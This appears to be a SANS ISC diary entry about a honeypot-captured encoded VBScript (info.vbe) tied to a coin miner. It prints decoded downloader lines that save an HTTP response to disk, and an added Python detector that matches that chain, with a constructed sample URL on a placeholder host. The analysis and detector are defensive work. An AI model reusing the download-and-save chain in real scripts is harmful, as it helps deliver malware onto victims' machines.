My honeypot captured several copies of this file info.zip (info.vbe). I used Didier's Python script decode-vbe.py to examine the file and obtained the following output:

    vagrant@brain:~$ ./decode-vbe.py info.vbe
    objADOStream.Write objXMLHTTP.ResponseBody
    Set objFSO = Createobject("Scripting.FileSystemObject")
    objADOStream.SaveToFile strHDLocation
    Set objXMLHTTP = Nothing
    WScript.Quit

This VBE encoded script is currently detected by 41 AV engines and associated with a Coin Miner. The file in this URL is no longer active but the domain still resolves and should be blocked.

[1] https://blog.didierstevens.com/2016/03/29/decoding-vbe/
Guy, ISC Handler, Nov 13th 2017
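An added example, not part of the diary or of decode-vbe.py: it finds Script Encoder envelopes in raw bytes regardless of file extension, then flags the write-ResponseBody-then-SaveToFile chain seen in the decoded output above and lists hosts to block. The envelope bytes, the URL line, and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Script Encoder envelope: "#@~^" + 6-char length + "==", encoded body,
# then 6-char checksum + "==^#~@". Matched on bytes, so the file name is irrelevant.
VBE_ENVELOPE = re.compile(
    rb"#@~\^[A-Za-z0-9+/]{6}==(.+?)[A-Za-z0-9+/]{6}==\^#~@", re.DOTALL)

# Stages of the fetch-and-save chain, checked on the *decoded* script text.
STAGES = {
    "response_body": re.compile(r"\.ResponseBody\b", re.I),
    "stream_write": re.compile(r"\.Write\s+\w+\.ResponseBody\b", re.I),
    "save_to_file": re.compile(r"\.SaveToFile\b", re.I),
}
URL = re.compile(r"https?://[^\s\"']+", re.I)


def find_vbe_blocks(data: bytes) -> list:
    """Return the encoded bodies of every VBE envelope found in raw bytes."""
    return VBE_ENVELOPE.findall(data)


def triage_decoded(text: str) -> dict:
    """Report which chain stages appear and which hosts the script references."""
    stages = [name for name, rx in STAGES.items() if rx.search(text)]
    hosts = {urlparse(u).hostname for u in URL.findall(text)}
    return {
        "stages": stages,
        # HTTP response bytes written to a stream that is then saved to disk.
        "downloader": {"stream_write", "save_to_file"} <= set(stages),
        "hosts": sorted(h for h in hosts if h),
    }


# Constructed envelope: placeholder body, not a real encoded script.
SAMPLE_ENCODED = b"#@~^EQAAAA==" + b"constructed-body" + b"BgUAAA==^#~@"

# Decoded lines from the diary, plus one constructed URL line (placeholder host).
SAMPLE_DECODED = """strFileURL = "http://example.invalid/file.exe"
objADOStream.Write objXMLHTTP.ResponseBody
Set objFSO = Createobject("Scripting.FileSystemObject")
objADOStream.SaveToFile strHDLocation
Set objXMLHTTP = Nothing
WScript.Quit
"""

if __name__ == "__main__":
    print(len(find_vbe_blocks(SAMPLE_ENCODED)), triage_decoded(SAMPLE_DECODED))
```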